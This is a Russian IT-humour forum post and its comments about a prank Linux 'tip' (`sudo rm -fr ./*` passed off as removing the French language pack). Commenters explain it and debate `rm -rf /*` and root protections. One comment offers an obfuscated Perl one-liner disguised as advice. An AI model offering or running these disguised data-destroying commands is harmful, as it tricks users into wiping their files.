2754

Советы от профессионала

Советы от профессионала

Советы по Линуксу. Всегда удаляйте французский языковой пакет:

sudo rm -fr ./*

IT-юмор

7.4K постов53.3K подписчика

Правила сообщества

Не публикуем посты:
1) с большим количеством мата
2) с просьбами о помощи
3) не относящиеся к IT-юмору

514
Автор поста оценил этот комментарий
Бригаду?
раскрыть ветку (1)
84

http://neolurk.org/wiki/Rm_-rf

Только в данном случае вместо rf используется fr, что похоже на сокращение от французского языка, ну и удаляется содержимое текущей папки, а не всего диска.

Короче, вредный совет такой.

показать ответы
5
Нет. Просто для решёния проблем rm -rf /*
раскрыть ветку (1)
21

Товарищ майор, тут РФ предлагают снести под корень

показать ответы
38

Всё так или иначе связано с булками

раскрыть ветку (1)
41

Съешь ещё этих мягких французских булок, да выпей чаю

показать ответы
2
DELETED

1111!!!!АДИН АДИН!!1111

раскрыть ветку (1)
8

Устроили тут, блядь, упячку. Благослави вас Господь!

показать ответы
DELETED

Вот именно это я имел ввиду, когда писал, что линукс позволяет трансректально выстрелить себе в ногу)))

раскрыть ветку (1)
8

А где здесь выстрел в ногу, при том трансректальный? Всё же очевидно и прозрачно.

показать ответы
0
DELETED
Я как-то на маке ввёл rm -fr собираясь ввести директорию, но мне позвонила супруга и я отвлёкся немного, а потом просто тапнул энтер не заметив, что директорию не выбрал ну и продолжил разговор не глядя на экран. Вообще удалялось всё долго, я даже успел остановить сие действо, это был личный мак, стажировка, что-то сохранилось в облаке, что-то нет и я плюнул, снес систему и установил заново. Ну и хорошо ещё что на гит код заливал
раскрыть ветку (1)
6

Сдаётся мне, сударь, вы сказки тут рассказываете. Ибо если просто ввести в терминале «rm -rf», то удалит эта команда ровно нихуя.

Ну а ещё, чтобы не говорили, что забыли дописать косую черту, можете ввести на Маке «rm -rf /» и наблюдать такое сообщение:

rm: “/“ may not be removed

показать ответы
29

-fr это 2 опции
-f - Игнорировать несуществующие файлы и аргументы. Никогда не выдавать запросы на подтверждение удаления.
-r - Удаление директорий и их содержимого. Рекурсивное удаление.

А удаление происходит из корневого раздела. На что указывает "/" в конце, что равноценно удалению всей системы

Вроде так

раскрыть ветку (1)
10

Только здесь не корневой раздел, а текущий. Корневой без всяких —no-preserve-root удалить не выйдет в большинстве систем.

показать ответы
9

Это Вы с парнем можете даже прямо во время соития передумать.

А *NIXы в консоли ошибок не прощают. У консольных команд в 95% случаев нет "корзины", trashcan ставят единицы. Если удалили - значит удалили. Насовсем. Если ОЧЕНЬ быстро спохватитесь и рубанете питание, то после долгой ебли специалист вам восстановит ваши файлы. Но очень зависит от типа FS, квалификации специалиста и многого другого.

раскрыть ветку (1)
5

Вот поэтому лучше удалять через забивание нулями, например хД

0
DELETED

А вот нефик устанавливать себе пингвинов, и даже не пытаться ни разу мануалы читать

раскрыть ветку (1)
4

Это смотря что надо. Для домашних задач большинства пользователей (фильмы, музычка, интернет и т.д.) можно просто из коробки ставить, и в большинстве современных дистрибутивов всё будет работать. Как бы, там и мануалы курить не надо, и вообще ничего менять.

показать ответы
152
Иллюстрация к комментарию
раскрыть ветку (1)
8

Вы таки удалили?

показать ответы
19
sudo позволяет делать любые действия в системе, так как поднимает привелегии, в том числе и изменение системных файлов
rm команда удаления в терминале линукса
-fr (чаще используют rf) созвучен с французской раскладкой, но на самом деле удаляет все папки без подтверждения
./* означает удалить все папки вообще

То есть прикол в том, что ты удалишь все файлы с системы безвозвратно и это сработает. Если в винде удалить папку windows у тебя не получится из-за того что она системная, то в линуксе ты можешь все удалить за одну строчку кода

А другие ребята в каментах пишут другие способы сделать тоже самое сверху, но просто запутанно

раскрыть ветку (1)
2

./* — удаление содержимого текущей папки. Точка не просто так стоит.

0
Почти все снесет, я проверял. Может что-то системное не разрешит, но система уже работать не будет. Щас поищу в своих комментах ссылку на этот эксперимент.
Вот, нашел
#comment_217752463
раскрыть ветку (1)
2

Есть огромная разница между /* и ./* Учите матчасть. Эта точка тут значит очень многое. Это раз. И я не знаю, в каком лохматом году вы проводили такой эксперимент. Современные системы не лалут так просто снести, прилётся хотя бы дописать —preserve-no-root. Только вместо тире два дефиса, у меня автозамена срабатывает с телефона.

показать ответы
1

окей, и почему там "*", по вашему?

мой пойнт - чтобы удалить все не-скрытые файлы и директории в корне, но не трогать сам корень. именно поэтому --preserve-no-root не нужен (потому что сам корень не удаляется).

а ваш пойнт про "*" каков?

раскрыть ветку (1)
1

А не будет «пойнта», честно говоря. Во-первых, я на «новопидорском» (не в обиду, иронизирую над молодёжным сленгом, вспоминая недавний мем) не говорю, потому не очень понимаю, какой смысл вы вкладываете в слово «пойнт». Во-вторых, боюсь, спор просто будет лишён смысла, ибо слишком много деталей, и всё проверить я не могу.

И man rm как-то не особо помогает.

Условно, shell, bash, zsh уже могут вести себя по-разному. А в разных ОС и ещё по-разному. Из интереса ввел команду у себя, меня спросили, действительно ли я хочу снести всё в /Users/EHOTnOTACKYH. Включая скрытое. Только проблема уже есть, я то вводил rm -rf /*. А не rm -rf /Users/EHOTnOTACKYH. То есть, макось, например, не даёт мне выполнить команду вне моей папки by default и by design так, как я попросил это сделать. Ну и ключ -rf как бы указывает, что меня переспрашивать не надо, а меня переспрашивают всё равно.

Логика в ваших рассуждениях ясна и понятна, но проблема в том, что оно не работает так, как должно практически в любом современном дистрибутиве. Хоть смейтесь, хоть плачьте, но даже роутер под OpenWRT не даёт себя вот так убить.

Ёбаные системы, считающие себя умнее того, кто ими управляет 🤷🏻‍♂️

показать ответы
0
DELETED
Проверять не хочу, история реальная. Возможно я всё же начал через таб вводить адрес директории и ввёл какой-нибудь Users/, не вспомню сейчас, а было это в 2019 году
раскрыть ветку (1)
1
снес систему и установил заново

Вот честно, я с трудом себе представляю, что нужно сделать с макосью, чтобы понадобилось переустанавливать систему. Я с 2006-го года, когда взял себе первый MacBook, делал это ровно два раза: первый раз, когда навернулся жёсткий диск и я поставил новый, второй раз буквально через один час после этого, когда оказалось, что я разметил диск при установке, как чувствительный к регистру символов, и ряд софта, вроде Фотошопа, с такой файловой системой не дружит. Итого, за 16 лет две, а, по сути, одна переустановка, и та по причине поломки винта, а не системы.

В 2019-ом, если только у вас не совсем древняя система была, пришлось бы сначала перезагрузить комп, удерживая зажатыми Cmd+R, отключить через терминал SIP, и только после этого система дала бы себя сломать. SIP в macOS появился в 2015-ом. И версия с древней системой тоже сомнительна, ибо вы пишете, что использовали Мак для разработки, а разработчиков Apple заставляет пользоваться свежими версиями: если Xcode вообще крайне требователен к сведести ОС, то даже если сам он и не нужен, то всё равно без всяких xcode-tools тот же homebrew не заведётся, а собирать всё из бинарников — ну, такое себе. 🤷🏻‍♂️

показать ответы

именно поэтому там * - чтобы никаких  —preserve-no-root не надо было

раскрыть ветку (1)
1

Нет, не поэтому. 🤷🏻‍♂️

показать ответы
39
DELETED
Уроки учите, школота. Надо так:

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
раскрыть ветку (1)
1

Не сработает.

Темы

Политика

Теги

Популярные авторы

Сообщества

18+

Теги

Популярные авторы